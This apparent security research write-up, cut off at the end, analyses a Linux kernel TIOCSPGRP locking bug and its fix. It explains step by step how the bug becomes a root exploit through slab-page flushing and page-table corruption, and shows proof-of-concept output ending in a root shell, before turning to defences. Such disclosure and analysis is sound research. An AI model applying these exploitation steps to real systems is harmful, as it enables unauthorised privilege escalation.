Pseudoterminals are a special type of terminal device, used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal. You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.

One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
 *      tiocgpgrp               -       get process group
 *      @tty: tty passed by user
 *      @real_tty: tty side of the tty passed by the user if a pty else the tty
 *      @p: returned pid
 *
 *      Obtain the process group of the tty. If there is no process group
 *      return an error.
 *
 *      Locking: none. Reference to current->signal->tty is safe.
 */
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pid;
        int ret;
        /*
         * (tty == real_tty) is a cheap way of
         * testing if the tty is NOT a master pty.
         */
        if (tty == real_tty && current->signal->tty != real_tty)
                return -ENOTTY;
        pid = tty_get_pgrp(real_tty);
        ret =  put_user(pid_vnr(pid), p);
        put_pid(pid);
        return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to these older parts of the userspace API. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't cover new APIs that have shown up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
 *      tiocspgrp               -       attempt to set process group
 *      @tty: tty passed by user
 *      @real_tty: tty side device matching tty passed by user
 *      @p: pid pointer
 *
 *      Set the process group of the tty to the session passed. Only
 *      permitted where the tty session is our session.
 *
 *      Locking: RCU, ctrl lock
 */
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pgrp;
        pid_t pgrp_nr;
[...]
        if (get_user(pgrp_nr, p))
                return -EFAULT;
[...]
        pgrp = find_vpid(pgrp_nr);
[...]
        spin_lock_irq(&tty->ctrl_lock);
        put_pid(real_tty->pgrp);
        real_tty->pgrp = get_pid(pgrp);
        spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
                                        real_tty->pgrp = get_pid(B)
    real_tty->pgrp = get_pid(A)
    spin_unlock_irq(...)                spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.
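
To make the bookkeeping concrete, here is a small single-threaded model of the first interleaving. This is only a sketch: pid_model, tty_model and run_updates are hypothetical names, the "threads" are just statement orderings, and the starting counts (two references on the old pid, one each on A and B) are assumptions chosen for illustration.

```c
/* Hypothetical stand-ins for struct pid and struct tty_struct. */
struct pid_model { int count; };
struct tty_model { struct pid_model *pgrp; };
struct counts { int old, a, b; };

static struct pid_model *get_pid_model(struct pid_model *pid)
{
    pid->count++;
    return pid;
}

static void put_pid_model(struct pid_model *pid)
{
    pid->count--;   /* the real put_pid() would free the object at zero */
}

/* Both sides drop the old pgrp before either one stores its new pgrp. */
static void racy_update(struct tty_model *tty,
                        struct pid_model *a, struct pid_model *b)
{
    put_pid_model(tty->pgrp);       /* side 1 */
    put_pid_model(tty->pgrp);       /* side 2 sees the same old pointer */
    tty->pgrp = get_pid_model(a);   /* side 1 */
    tty->pgrp = get_pid_model(b);   /* side 2 overwrites A without dropping it */
}

/* What happens when the same lock really serializes the two calls. */
static void serialized_update(struct tty_model *tty,
                              struct pid_model *a, struct pid_model *b)
{
    put_pid_model(tty->pgrp);
    tty->pgrp = get_pid_model(a);
    put_pid_model(tty->pgrp);
    tty->pgrp = get_pid_model(b);
}

/* Assumed starting point: old pid has 2 references (its task and the tty). */
struct counts run_updates(int racy)
{
    struct pid_model old = { 2 }, a = { 1 }, b = { 1 };
    struct tty_model tty = { &old };

    if (racy)
        racy_update(&tty, &a, &b);
    else
        serialized_update(&tty, &a, &b);

    return (struct counts){ old.count, a.count, b.count };
}
```

In the serialized case the old pid keeps the one reference that its task still holds; in the racy case that reference has been dropped as well, and A ends up with a reference that nothing accounts for.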

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
        goto out_unlock;
    retval = 0;
-   spin_lock_irq(&tty->ctrl_lock);
+   spin_lock_irq(&real_tty->ctrl_lock);
    put_pid(real_tty->pgrp);
    real_tty->pgrp = get_pid(pgrp);
-   spin_unlock_irq(&tty->ctrl_lock);
+   spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
    rcu_read_unlock();
    return retval;

Attack stages

In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.

What we'd really want as an attacker is a way to skew the refcount deterministically. Failing that, we have to somehow compensate for our lack of information about whether the refcount was skewed successfully. There are three options: we could try to make the race deterministic (which seems difficult); we could assume after each attempt that the race worked and run the rest of the exploit (if the refcount wasn't skewed, there is no memory corruption, so nothing bad will happen); or we could try to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
        int nr;
        struct pid_namespace *ns;
};

struct pid
{
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
        struct pid_namespace *ns;

        if (!pid)
                return;

        ns = pid->numbers[pid->level].ns;
        if ((atomic_read(&pid->count) == 1) ||
             atomic_dec_and_test(&pid->count)) {
                kmem_cache_free(ns->pid_cachep, pid);
                put_pid_ns(ns);
        }
}
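
The arithmetic behind "the pid will be freed at some point during step 5" can be sketched with a model of the decision logic in put_pid(). Everything here is hypothetical (pid_model, first_uaf_drop and the example numbers are mine, not the proof of concept's); it assumes the task's own reference is already gone and that 0 < skew < refs_created.

```c
#include <stdbool.h>

struct pid_model {
    int count;
    bool freed;
};

/* Same decision logic as put_pid(), minus the namespace handling. */
static void put_pid_model(struct pid_model *pid)
{
    if (pid->count == 1 || --pid->count == 0)
        pid->freed = true;
}

/*
 * refs_created: references queued up in step 2.
 * skew:         how far the race has pushed the refcount down in step 3.
 * Returns the 1-based index of the first put that would touch an
 * already-freed object, or 0 if the object survives until the last put.
 */
int first_uaf_drop(int refs_created, int skew)
{
    /* After step 4, only the queued references minus the skew are counted. */
    struct pid_model pid = { .count = refs_created - skew, .freed = false };

    for (int drop = 1; drop <= refs_created; drop++) {
        if (pid.freed)
            return drop;
        put_pid_model(&pid);
    }
    return 0;
}
```

With, say, 10000 queued references and a skew of 10, the 9990th put frees the object and the 9991st is the first use-after-free; with no skew at all, the last put frees the object and nothing bad happens.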

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)
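
As a rough check of the "zero to 64 GiB" figure, the following sketch rebuilds the layout of the 4.19 struct pid with fixed-width fields and computes where the load of numbers[level].ns lands. The model types are hypothetical, pointers are represented as uint64_t, and a 64-bit build with four PIDTYPE entries is assumed.

```c
#include <stddef.h>
#include <stdint.h>

/* Layout model only; pointers are modelled as uint64_t (64-bit build assumed). */
struct upid_model {
    int32_t nr;
    uint64_t ns;
};

struct pid_layout_model {
    uint32_t count;
    uint32_t level;
    uint64_t tasks[4];              /* PIDTYPE_PID, TGID, PGID, SID */
    uint64_t rcu[2];                /* struct rcu_head: next, func */
    struct upid_model numbers[1];
};

/* Byte offset, relative to the start of the struct pid, of numbers[level].ns. */
uint64_t ns_load_offset(uint32_t level)
{
    return offsetof(struct pid_layout_model, numbers)
         + (uint64_t)level * sizeof(struct upid_model)
         + offsetof(struct upid_model, ns);
}
```

Each struct upid takes up 16 bytes, so a garbage 32-bit level can move the load anywhere from offset 0x40 (level 0) to slightly beyond 2^32 * 16 bytes = 64 GiB past the object.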

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit different and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

root@deb10:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
root@deb10:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb  6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 seq_file -> :A-0000128
root@deb10:/sys/kernel/slab# 

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset  pid                           eventpoll_epi / epitem (RCU-freed)    seq_file
0x00    count.counter (4) (CONTROL)   rbn.__rb_parent_color (8) (TARGET?)   buf (8) (TARGET?)
0x04    level (4)
0x08    tasks[PIDTYPE_PID] (8)        rbn.rb_right (8) / rcu.func (8)       size (8)
0x10    tasks[PIDTYPE_TGID] (8)       rbn.rb_left (8)                       from (8)
0x18    tasks[PIDTYPE_PGID] (8)       rdllink.next (8)                      count (8)
0x20    tasks[PIDTYPE_SID] (8)        rdllink.prev (8)                      pad_until (8)
0x28    rcu.next (8)                  next (8)                              index (8)
0x30    rcu.func (8)                  ffd.file (8)                          read_pos (8)
0x38    numbers[0].nr (4)             ffd.fd (4)                            version (8)
0x3c    [hole] (4)                    nwait (4)
0x40    numbers[0].ns (8)             pwqlist.next (8)                      lock (0x20): counter (8)
0x48    ---                           pwqlist.prev (8)
0x50    ---                           ep (8)
0x58    ---                           fllink.next (8)
0x60    ---                           fllink.prev (8)                       op (8)
0x68    ---                           ws (8)                                poll_event (4)
0x6c    ---                                                                 [hole] (4)
0x70    ---                           event.events (4)                      file (8)
0x74    ---                           event.data (8) (CONTROL)
0x78    ---                                                                 private (8) (TARGET?)
0x7c    ---                           ---
0x80    ---                           ---                                   ---

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU. Both SLUB and the page allocator use per-cpu structures; so if the kernel migrates us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.
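
The object counts used in steps 3, 4, 7 and 9 can be written down as a small helper. This is a sketch under assumptions: flush_plan and make_flush_plan are hypothetical names, and the two inputs would have to be determined for the target cache (SLUB exposes objs_per_slab and cpu_partial files under /sys/kernel/slab/<cache>/, but I am treating concrete values as examples only).

```c
/* Object counts for the page-flushing steps; all names are illustrative. */
struct flush_plan {
    unsigned long fill_objs;         /* step 3: fill (1 + cpu_partial) pages */
    unsigned long pre_victim_objs;   /* step 4: objs_per_slab - 1 */
    unsigned long post_victim_objs;  /* step 7: objs_per_slab + 1 */
    unsigned long step9_frees;       /* step 9: one free per page from step 3 */
};

struct flush_plan make_flush_plan(unsigned long objs_per_slab,
                                  unsigned long cpu_partial)
{
    struct flush_plan plan;

    plan.fill_objs = objs_per_slab * (1 + cpu_partial);
    plan.pre_victim_objs = objs_per_slab - 1;
    plan.post_victim_objs = objs_per_slab + 1;
    /* Freeing every objs_per_slab-th object from step 3 touches each page once. */
    plan.step9_frees = plan.fill_objs / objs_per_slab;
    return plan;
}
```

For 128-byte objects in a 4 KiB page, objs_per_slab is 32; with an assumed cpu_partial of 30, this gives 992 objects for step 3, 31 for step 4, 33 for step 7, and 31 single-object frees for step 9.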

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

Page tables are one type of allocation that is served directly from the page allocator and has nice properties for exploitation (they have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to:

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a 64-bit PTE. Because x86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid: count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ... 
pagetable:       PTE      |     PTE     |     PTE     |     PTE     | ...
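
The overlap can be modelled in a few lines. This sketch uses hypothetical helper names, assumes 128-byte objects (the size class of the merged cache) and a little-endian host, and operates on a plain integer instead of a real page table.

```c
#include <stdint.h>
#include <string.h>

#define PTE_SIZE    8u
#define OBJECT_SIZE 128u   /* assumed object size of the merged kmem_cache */

/* Index of the PTE that overlaps the refcount of the object in slot `slot`. */
unsigned int pte_index_for_slot(unsigned int slot)
{
    return slot * OBJECT_SIZE / PTE_SIZE;
}

/* Add 1 to the 32-bit value stored in the first four bytes of a 64-bit PTE,
 * which is what get_pid() does to the overlapping count field. */
uint64_t bump_count_in_pte(uint64_t pte)
{
    uint32_t count;

    memcpy(&count, &pte, sizeof(count));   /* bytes 0..3 of the PTE */
    count++;
    memcpy(&pte, &count, sizeof(count));
    return pte;
}
```

On a little-endian machine, bytes 0..3 are the least significant half, so the increment behaves like an increment of the whole PTE unless that half is 0xffffffff, in which case it wraps to zero without carrying into the upper half.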

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault.

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.
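
The increment arithmetic can be checked on a made-up PTE value. The bit positions are the standard x86 ones (Read/Write is bit 1, Dirty is bit 6); the helper names and the example PTE are purely illustrative.

```c
#include <stdint.h>

#define PTE_RW     0x02ULL   /* x86 PTE bit 1: Read/Write */
#define PTE_DIRTY  0x40ULL   /* x86 PTE bit 6: Dirty */
#define PTE_BIT7   0x80ULL   /* the bit that is left set at the end */

/* Adding only behaves like setting bits if the affected bits start out
 * clear, so that no carry spills into neighbouring bits. */
int increments_are_safe(uint64_t pte)
{
    return (pte & (PTE_RW | PTE_DIRTY | PTE_BIT7)) == 0;
}

/* First round of get_pid() calls: 0x42 increments set R/W and Dirty. */
uint64_t after_first_round(uint64_t pte)
{
    return pte + 0x42;
}

/* Second round: 0x80 - 0x42 = 0x3e more increments clear R/W and Dirty
 * again and leave only bit 7 set. */
uint64_t after_second_round(uint64_t pte)
{
    return pte + 0x3e;
}
```

For an example read-only PTE whose low byte is 0x25 (present, user, accessed), the first round yields a low byte of 0x67 and the second round yields 0xa5, which is the original value plus 0x80.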

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

user@deb10:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
user@deb10:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
root@deb10:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
root@deb10:/home/user/tiocspgrp# 

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought not to influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
  1 struct __attribute__((capability("mutex"))) mutex {
  2 };
  3 
  4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
  5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
  6 
  7 struct foo {
  8     int a __attribute__((guarded_by(mutex)));
  9     struct mutex mutex;
 10 };
 11 
 12 int good(struct foo *p1, struct foo *p2) {
 13     lock_mutex(&p1->mutex);
 14     int result = p1->a;
 15     unlock_mutex(&p1->mutex);
 16     return result;
 17 }
 18 
 19 int bogus(struct foo *p1, struct foo *p2) {
 20     lock_mutex(&p1->mutex);
 21     int result = p2->a;
 22     unlock_mutex(&p1->mutex);
 23     return result;
 24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
    int result = p2->a;
                     ^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$ 

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably necessary anyway to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but it focuses mainly on deadlock detection and, to a lesser degree, on locking correctness of RCU pointers; again, there is no mechanism to, for example, automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

